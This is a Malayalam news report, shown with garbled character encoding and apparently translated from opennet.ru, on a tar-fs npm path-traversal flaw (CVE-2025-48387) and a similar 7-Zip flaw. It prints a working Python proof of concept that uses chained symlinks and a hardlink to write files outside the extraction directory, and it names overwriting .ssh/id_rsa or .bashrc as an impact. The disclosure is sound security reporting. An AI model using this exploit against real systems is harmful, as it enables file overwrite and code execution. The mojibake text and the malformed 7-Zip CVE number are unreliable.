tar-fs NPM เดชเดพเดเตเดเตเดเดฟเตฝ เดเดฐเต เดฆเตเตผเดฌเดฒเดค (CVE-2025-48387) เดคเดฟเดฐเดฟเดเตเดเดฑเดฟเดเตเดเดฟเดเตเดเตเดฃเตเดเต, เดเดคเต เดชเตเดฐเดคเตเดฏเตเดเด เดฐเตเดชเดเตฝเดชเตเดชเดจ เดเตเดฏเตเดค tar เดเตผเดเตเดเตเดตเต เด เตบเดชเดพเดเตเดเต เดเตเดฏเตเดฏเตเดฎเตเดชเตเตพ, เด เตบเดชเดพเดเตเดเต เดเตเดฏเตเดฏเตเดจเตเดจ เดกเดฏเดฑเดเตเดเดฑเดฟเดฏเดฟเตฝ เดฎเดพเดคเตเดฐเด เดเดคเตเดเตเดเดพเดคเตเดค FS เดจเตเดฑเต เดเดคเต เดญเดพเดเดคเตเดคเตเดเตเดเตเด เดซเดฏเดฒเตเดเตพ เดเดดเตเดคเดพเตป เด เดจเตเดตเดฆเดฟเดเตเดเตเดจเตเดจเต (เดจเดฟเดฒเดตเดฟเดฒเต เดเดชเดฏเตเดเตเดคเดพเดตเดฟเดจเตเดฑเต เดเดเตโเดธเดธเต เด เดตเดเดพเดถเดเตเดเตพ เด เดจเตเดตเดฆเดฟเดเตเดเตเดจเตเดจเดฟเดเดคเตเดคเตเดณเด). เดจเดฟเดฒเดตเดฟเดฒเตเดณเตเดณ เดซเดฏเดฒเตเดเตพ เดเดตเตผเดฑเตเดฑเตเดฑเต เดเตเดฏเตเดฏเตเดจเตเดจเดคเดฟเดจเตเด เดฆเตเตผเดฌเดฒเดค เดเดชเดฏเตเดเดฟเดเตเดเดพเด, เดเดฆเดพเดนเดฐเดฃเดคเตเดคเดฟเดจเต, เดธเดฟเดธเตเดฑเตเดฑเดคเตเดคเดฟเตฝ เดจเดฟเดเตเดเดณเตเดเต เดเตเดกเดฟเดจเตเดฑเต เดเดเตเดธเดฟเดเตเดฏเตเดทเตป เดธเดเดเดเดฟเดชเตเดชเดฟเดเตเดเตเดจเตเดจเดคเดฟเดจเต, เดเดชเดฏเตเดเตเดคเดพเดตเดฟเดจเตเดฑเต เดนเตเด เดกเดฏเดฑเดเตเดเดฑเดฟเดฏเดฟเดฒเต ".ssh/id_rsa" เด เดฒเตเดฒเตเดเตเดเดฟเตฝ ".bashrc" เดซเดฏเดฒเตเดเตพ เดตเตเดฃเตเดเตเด เดเดดเตเดคเดพเตป เดเดดเดฟเดฏเตเด.
tar-fs เดชเดพเดเตเดเตเดเต เดเดดเตเดเดฏเดฟเตฝ 23 เดฆเดถเดฒเดเตเดทเด เดคเดตเดฃ เดกเตเตบเดฒเตเดกเต เดเตเดฏเตเดฏเดชเตเดชเตเดเตเดจเตเดจเต เดเดจเตเดจเดคเตเด 1155 เดชเตเดฐเตเดเดเตเดเตเดเดณเดฟเตฝ เดเดฐเต เดเดถเตเดฐเดฟเดคเดคเตเดตเดฎเดพเดฏเดฟ เดเดชเดฏเตเดเดฟเดเตเดเตเดจเตเดจเต เดเดจเตเดจเดคเตเด เดเดฃเดเตเดเดฟเดฒเตเดเตเดเตเดเตเดฎเตเดชเตเตพ เด เดชเตเดฐเดถเตเดจเด เดจเดฟเตผเดฃเดพเดฏเดเดฎเดพเดฃเตเดจเตเดจเต เดตเดฟเดฒเดฏเดฟเดฐเตเดคเตเดคเดชเตเดชเตเดเตเดจเตเดจเต. เดฎเตเดฏเต เดฎเดพเดธเดคเตเดคเดฟเตฝ เดชเตเดฑเดคเตเดคเดฟเดฑเดเตเดเดฟเดฏ 3.0.9, 2.1.3, 1.16.5 เดชเดคเดฟเดชเตเดชเตเดเดณเดฟเตฝ เด เดฆเตเตผเดฌเดฒเดค เดชเดฐเดฟเดนเดฐเดฟเดเตเดเต, เดชเดเตเดทเต เดฆเตเตผเดฌเดฒเดคเดฏเตเดเตเดเตเดฑเดฟเดเตเดเตเดณเตเดณ เดตเดฟเดตเดฐเดเตเดเตพ เดเดเดฆเตเดถเด 3 เดฎเดพเดธเดเตเดเตพเดเตเดเต เดถเตเดทเดฎเดพเดฃเต เดตเตเดณเดฟเดชเตเดชเตเดเตเดคเตเดคเดฟเดฏเดคเต.
เดเตผเดเตเดเตเดตเดฟเดฒเต เดธเดฟเดเดฌเตเดณเดฟเดเต, เดนเดพเตผเดกเต เดฒเดฟเดเตเดเตเดเดณเตเดเต เดชเดฐเดฟเดถเตเดงเดจเดเตพ เด เตบเดชเดพเดเตเดเต เดเตเดฏเตเดฏเตเดจเตเดจเดคเดฟเดจเดพเดฏเดฟ เดฒเดเตเดทเตเดฏ เดกเดฏเดฑเดเตเดเดฑเดฟเดเตเดเดชเตเดชเตเดฑเดคเตเดคเตเดเตเดเต เดตเตเดฏเดพเดชเดฟเดเตเดเตเดจเตเดจเดฟเดฒเตเดฒเตเดจเตเดจเต เดเดฑเดชเตเดชเดพเดเตเดเดพเตป เด เดตเดฏเตเดเตเดเต เดฎเดคเดฟเดฏเดพเดฏ เดชเดฐเดฟเดถเตเดงเดจเดเตพ เดเดฒเตเดฒเดพเดคเตเดคเดคเดพเดฃเต เด เดฆเตเตผเดฌเดฒเดคเดฏเตเดเตเดเต เดเดพเดฐเดฃเด. เดเตเดเตเดเตเดเตพ เดฎเดฑเดฟเดเดเดเตเดเดพเตป, เดฐเดฃเตเดเต เดธเดฟเดเดฌเตเดณเดฟเดเต เดฒเดฟเดเตเดเตเดเตพ เดเดชเดฏเตเดเดฟเดเตเดเตเดจเตเดจเต: เดเดฆเตเดฏเดคเตเดคเตเดคเต เดเตผเดเตเดเตเดตเต เด เตบเดชเดพเดเตเดเต เดเตเดฏเตเดฏเตเดจเตเดจเดคเดฟเดจเดพเดฏเดฟ เดฑเตเดเตเดเต เดกเดฏเดฑเดเตเดเดฑเดฟเดฏเดฟเดฒเตเดเตเดเต เดชเตเดฏเดฟเดจเตเดฑเต เดเตเดฏเตเดฏเตเดจเตเดจเต ("."), เดฐเดฃเตเดเดพเดฎเดคเตเดคเตเดคเต เดเดฆเตเดฏเดคเตเดคเต เดธเดฟเดเดฌเตเดณเดฟเดเต เดฒเดฟเดเตเดเดฟเดจเต เดเดชเตเดเตเดทเดฟเดเดฎเดพเดฏเดฟ เดธเตเดทเตเดเดฟเดเตเดเตเดเดฏเตเด เด เดเดฟเดธเตเดฅเดพเดจ เดกเดฏเดฑเดเตเดเดฑเดฟเดเตเดเดชเตเดชเตเดฑเดคเตเดคเตเดเตเดเต เดตเตเดฏเดพเดชเดฟเดเตเดเดพเตป เดชเตเดฐเดฟเตฝ "../" เดชเตเดฐเดคเตเดเดเตเดเตพ เดเดชเดฏเตเดเดฟเดเตเดเตเดเดฏเตเด เดเตเดฏเตเดฏเตเดจเตเดจเต. เดเดฆเดพเดนเดฐเดฃเดคเตเดคเดฟเดจเต, เดเดฆเตเดฏ เดฒเดฟเดเตเดเต "noop/noop/noop" "." เดฒเตเดเตเดเต เดชเตเดฏเดฟเดจเตเดฑเต เดเตเดฏเตเดฏเตเดจเตเดจเต, เดฐเดฃเตเดเดพเดฎเดคเตเดคเต "noop/noop/noop/../../../" "./../../" เดเดฏเดฟ เดตเดฟเดเดธเดฟเดชเตเดชเดฟเดเตเดเดฟเดฐเดฟเดเตเดเตเดจเตเดจเต. เดเตผเดเตเดเตเดตเดฟเดฒเต เดซเดฏเดฒเตเดเดณเตเดเต เดเดตเตผเดฑเตเดฑเตเดฑเดฟเดเดเต เดเตเดฐเดฎเตเดเดฐเดฟเดเตเดเตเดจเตเดจเดคเดฟเดจเต, เดฐเดฃเตเดเดพเดฎเดคเตเดคเต เดธเดฟเดเดฌเตเดณเดฟเดเต เดฒเดฟเดเตเดเตเดฎเดพเดฏเดฟ เดคเดพเดฐเดคเดฎเตเดฏเดชเตเดชเตเดเตเดคเตเดคเตเดฎเตเดชเตเตพ เดเดฐเต เดฌเดพเดนเตเดฏ เดซเดฏเดฒเดฟเดฒเตเดเตเดเต เดชเตเดฏเดฟเดจเตเดฑเต เดเตเดฏเตเดฏเตเดจเตเดจ เดเดฐเต เดนเดพเตผเดกเต เดฒเดฟเดเตเดเต เดธเตเดทเตเดเดฟเดเตเดเดพเตป เดเดดเดฟเดฏเตเด. tarfile.open("poc.tar", mode="x") เดเดชเดฏเตเดเดฟเดเตเดเต เดเดพเตผเดซเดฏเตฝ เดเดฑเดเตเดเตเดฎเดคเดฟ เดเตเดฏเตเดฏเตเด: root = tarfile.TarInfo("root") root.linkname = ("noop/" * 15) + ("../" * 15) root.type = tarfile.SYMTYPE tar.addfile(root) noop = tarfile.TarInfo("noop") noop.linkname = "." noop.type = tarfile.SYMTYPE tar.addfile(noop) hard = tarfile.TarInfo("hardflag") hard.linkname = "root/home/username/flag/flag" hard.type = tarfile.LNKTYPE tar.addfile(hard) content = b"overwrite\n" overwrite = tarfile.TarInfo("hardflag") overwrite.size = len(content) overwrite.type = tarfile.REGTYPE tar.addfile(overwrite, fileobj=io.BytesIO(content)) content = b"new!\n" newfile = tarfile.TarInfo("root/home/username/flag/newfile") newfile.size = len(content) newfile.type = tarfile.REGTYPE tar.addfile(newfile, fileobj=io.BytesIO(content))
2025-Zip เดเตผเดเตเดเตเดตเดฑเดฟเดฒเตเด เดธเดฎเดพเดจเดฎเดพเดฏ เดเดฐเต เดฆเตเตผเดฌเดฒเดค (CVE-55188-7) เดเดฃเตเดเตเดคเตเดคเดฟ. เด
เดเดฟเดธเตเดฅเดพเดจ เดกเดฏเดฑเดเตเดเดฑเดฟเดเตเดเต เดชเตเดฑเดคเตเดคเต เดซเดฏเดฒเตเดเตพ เดเดดเตเดคเดพเตป, เดซเดฏเตฝ เดชเดพเดคเตเดคเดฟเตฝ "../" เดเดจเตเดจ เดเตเดฐเดฎเดฎเตเดณเตเดณ เดธเดฟเดเดฌเตเดณเดฟเดเต เดฒเดฟเดเตเดเตเดเดณเตเด 7-Zip-เดจเต เดเดชเดฏเตเดเดฟเดเตเดเดพเด. เดธเดฟเดเดฌเตเดณเดฟเดเต เดฒเดฟเดเตเดเตเดเดณเดพเดฏ zip, tar, 7z, rar เดเดจเตเดจเดฟเดตเดฏเต เดชเดฟเดจเตเดคเตเดฃเดฏเตเดเตเดเตเดจเตเดจ 7-Zip เดเดชเดฏเตเดเดฟเดเตเดเต เดเดคเตเดเตเดเดฟเดฒเตเด เดเตผเดเตเดเตเดตเตเดเตพ เด
เตบเดชเดพเดเตเดเต เดเตเดฏเตเดฏเตเดฎเตเดชเตเตพ เดชเตเดฐเดถเตเดจเด เดชเตเดฐเดฏเตเดเดจเดชเตเดชเตเดเตเดคเตเดคเดพเด. 7-Zip เดชเดคเดฟเดชเตเดชเต 25.01-เตฝ เดชเตเดฐเดถเตเดจเด เดชเดฐเดฟเดนเดฐเดฟเดเตเดเดฟเดเตเดเตเดฃเตเดเต.
เด
เดตเดฒเดเดฌเด: opennet.ru
